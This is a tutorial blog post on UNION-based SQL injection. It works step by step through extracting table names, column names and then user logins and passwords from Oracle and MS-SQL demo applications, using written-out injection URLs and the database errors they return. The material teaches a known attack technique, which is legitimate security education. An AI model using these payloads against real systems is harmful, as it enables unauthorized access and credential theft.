Wednesday, August 21, 2024
Latest:

Eduguru

Tech Blog and Discussion

Tutorial Web Hosting Website 

Extracting Useful Data

Krishna , , , , , , , , , , , , ,

In order to extract useful data from the database, you normally need to know the names of the tables and columns containing the data you wish to access. The main enterprise DBMS’s contain a rich amount of database metadata that you can query to discover the names of every table and column within the database. The methodology for extracting useful data is the same in each case; however, the details differ on different database platforms. We will examine examples of extracting useful data from Oracle and MS-SQL databases.

An Oracle Hack

Consider an HR application that allows users to perform employee searches. A typical search employs the following URL:

https://wahh-app.com/employees.asp?EmpNo=7521

This search returns the following results:

Screenshot from 2020-05-06 22:44:37

We attempt to perform a UNION attack, and so need to determine the required number of columns used in the query (which may differ from the number of columns returned in the application’s reponses). Injecting a query that returns a single column results in an error message:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL%20from%20dual–

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns

We continue adding additional NULL s to the injected query until no error message is returned, and our query is executed:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20NULL,NULL,NULL,NULL%20from%20dual–

Screenshot from 2020-05-06 23:21:01

Note the blank line which has now been added to the table, containing the NULL results from our injected query.

Having determined the number of columns, we now need to find a column which has a string data type. Our first attempt is unsuccessful:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20’a’,NULL,NULL,NULL%20from%20dual–

[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as corresponding expression

We target the second column, and this is successful, returning a row of data containing the input we specified:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20NULL,’a’,NULL,NULL%20from%20dual–

Screenshot from 2020-05-06 23:22:36

We now have a means of extracting string data from the database. Our next step is to find out the names of the database tables that may contain interesting information. We can do this by querying the user_objects table, which displays details of user-defined tables and other items:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20NULL,object_name,object_type,NULL%20from%20user_objects–

Screenshot from 2020-05-06 23:24:00

Many of these tables may contain sensitive data, including information about employees that we cannot legitimately access given our privilege level. An obvious point of initial attack is the table called USERS , which may contain credentials. We can discover the names of the columns within this table by querying the user_tab_columns table:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20NULL,column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%3d%20’USERS’–

Screenshot from 2020-05-06 23:25:05

This output confirms that the USERS table does indeed contain sensitive data, including passwords and session tokens. We now have everything we need to extract any of this information. For example:

https://wahhapp.com/employees.aspEmpNo=7521%20UNION%20SELECT%20NULL,login,password,NULL%20from%20users–

Screenshot from 2020-05-06 23:26:24

An MS-SQL Hack

Let’s take a look at a similar attack being performed against an MS-SQL data- base. Consider a retailing application that allows users to search a product catalog. A typical search uses the following URL:

https://wahh-app.com/products.asp?q=hub

This search returns the following results:

Screenshot from 2020-05-06 23:29:49

First, we need to determine the required number of columns. Testing for a single column results in an error message:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null–

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

We add a second NULL , and our query is executed, generating an additional item in the results table:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20null,null–

Screenshot from 2020-05-06 23:31:17

We now verify that the first column in the query contains string data:

https://wahh-app.com/products.asp?q=hub’%20union%20select%20’a’,null–

Screenshot from 2020-05-06 23:32:39

Our next step is to find out the names of the database tables that may contain interesting information. We can do this by querying the sysobjects table, which contains details of all objects within the database. To retrieve only the user-defined objects, we specify the type U :

https://wahhapp.com/products.aspq=hub’%20union%20select%20name,null%20from%20sysobjects%20where%20xtype%3d’U’–

Screenshot from 2020-05-06 23:33:41

Again here, the Users table is an obvious place to begin extracting data. To discover the names of columns within the users table, we can query the syscolumns table:

https://wahhapp.com/products.aspq=hub’%20UNION%20select%20b.name,null%20from%20sysobjects%20a,syscolumns%20b%20where%20a.id=b.id%20and%20a.name%3d’users’–

Screenshot from 2020-05-06 23:34:44

We now have everything we need to extract the information within the Users table. For example:

https://wahh-app.com/products.asp?q=hub’%20UNION%20select%20login,password%20from%20users–

Screenshot from 2020-05-06 23:35:51

NEXT is..Exploiting ODBC Error Messages (MS-SQL Only)…,,,,,,,,,

Posts to Review:

Default ThumbnailFingerprinting the Database Default ThumbnailInjecting into SQL Default ThumbnailFinding SQL Injection Bugs Default ThumbnailThe UNION Operator